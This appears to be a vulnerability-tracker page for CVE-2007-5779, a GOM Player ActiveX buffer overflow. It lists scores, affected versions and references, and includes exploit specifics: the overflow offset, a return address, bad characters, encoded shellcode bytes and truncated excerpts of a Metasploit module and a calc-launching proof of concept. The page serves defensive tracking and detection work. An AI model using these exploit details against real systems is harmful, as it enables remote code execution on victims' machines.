CVE-2007-5779
published 2007-11-01CVE-2007-5779: Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player (GOM Player) 2.1.6.3499 allows remote…
PriorityP266high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
71.51%
99.3th percentile
Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player (GOM Player) 2.1.6.3499 allows remote attackers to execute arbitrary code via a long argument to the OpenUrl method.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gom_player | gom_player | — | — |
| gomlab | gom_media_player | <= 2.1.36.5083 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36
bytes↗
%67%31%41%7e
- →Exploit triggers a stack buffer overflow at offset 506 bytes into the OpenURL() argument; monitor ActiveX method calls to GomWeb3.dll where the OpenURL argument length exceeds 506 characters. ↗
- →The PoC exploit constructs the malicious buffer as 506 'A' characters + EIP overwrite + NOP sled + shellcode; detect strings of 506+ repeated characters passed to GomManager.OpenURL in browser script. ↗
- →The return address used for Windows XP SP2 English is 0x7e497c7b (JMP ESP in a system DLL); use this as a ROP/return address indicator in memory forensics or exploit detection. ↗
- →Payload bad characters for this exploit are null byte, tab, LF, CR, single-quote, and backslash; encoded shellcode in exploit traffic will avoid these bytes. ↗
- →The Metasploit module uses a StackAdjustment of -3500, which is an unusual ESP manipulation value that may appear in memory analysis of exploited processes. ↗
- ·The confirmed vulnerable version is GOM Player 2.1.6.3499 with GomWeb3.dll version 1.0.0.12 only; other versions are not confirmed affected. ↗
- ·The Metasploit module's return address (0x7e497c7b) is specific to Windows XP SP2 Pro English; exploitation against other OS versions or service packs requires a different return address. ↗
- ·The Metasploit module payload space is limited to 800 bytes; shellcode exceeding this size will not fit in the exploit buffer. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-vjwp-mv34-wrm9: Unspecified vulnerability in the Open URL feature in Gretech GOM Media Player before 2
ghsa_unreviewed·2022-05-14·CVSS 7.5
CVE-2012-1774 [HIGH] GHSA-vjwp-mv34-wrm9: Unspecified vulnerability in the Open URL feature in Gretech GOM Media Player before 2
Unspecified vulnerability in the Open URL feature in Gretech GOM Media Player before 2.1.39.5101 has unknown impact and attack vectors, a different vulnerability than CVE-2007-5779 and CVE-2012-1264.
GHSA
GHSA-q2r3-489p-vqx4: Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3
ghsa_unreviewed·2022-05-01
CVE-2007-5779 [HIGH] CWE-119 GHSA-q2r3-489p-vqx4: Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3
Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player (GOM Player) 2.1.6.3499 allows remote attackers to execute arbitrary code via a long argument to the OpenUrl method.
VulnCheck
gom_player gom_player Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2007·CVSS 7.5
CVE-2007-5779 [HIGH] gom_player gom_player Improper Restriction of Operations within the Bounds of a Memory Buffer
gom_player gom_player Improper Restriction of Operations within the Bounds of a Memory Buffer
Buffer overflow in the GomManager (GomWeb Control) ActiveX control in GomWeb3.dll 1.0.0.12 in Gretech Online Movie Player (GOM Player) 2.1.6.3499 allows remote attackers to execute arbitrary code via a long argument to the OpenUrl method.
Affected: gom_player gom_player
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://archive.f-secure.com/weblog/archives/00001393; https://www.virusbulletin.com/virusbulletin/2010/05/exploit-kit-explosion-part-two-vectors-attack/
No detection rules found.
Exploit-DB
GOM Player - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2007-5779 GOM Player - ActiveX Control Buffer Overflow (Metasploit)
GOM Player - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: gom_openurl.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'GOM Player ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in GOM Player 2.1.6.3499.
By sending an overly long string to the "OpenUrl()" method located
in the GomWeb3.dll Control, an attacker may be able to execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 9262 $',
'Referenc
Exploit-DB
GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow
exploitdb·2007-10-29
CVE-2007-5779 GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow
GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow
---
//open calc.exe
scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%
Metasploit
GOM Player ActiveX Control Buffer Overflow
metasploit
GOM Player ActiveX Control Buffer Overflow
GOM Player ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in GOM Player 2.1.6.3499. By sending an overly long string to the "OpenUrl()" method located in the GomWeb3.dll Control, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
http://secunia.com/advisories/27418http://www.gomplayer.com/forum/viewtopic.html?t=1013http://www.securityfocus.com/bid/26236http://www.vupen.com/english/advisories/2007/3634https://exchange.xforce.ibmcloud.com/vulnerabilities/38159https://www.exploit-db.com/exploits/4579http://secunia.com/advisories/27418http://www.gomplayer.com/forum/viewtopic.html?t=1013http://www.securityfocus.com/bid/26236http://www.vupen.com/english/advisories/2007/3634https://exchange.xforce.ibmcloud.com/vulnerabilities/38159https://www.exploit-db.com/exploits/4579
2007-11-01
Published
Exploited in the wild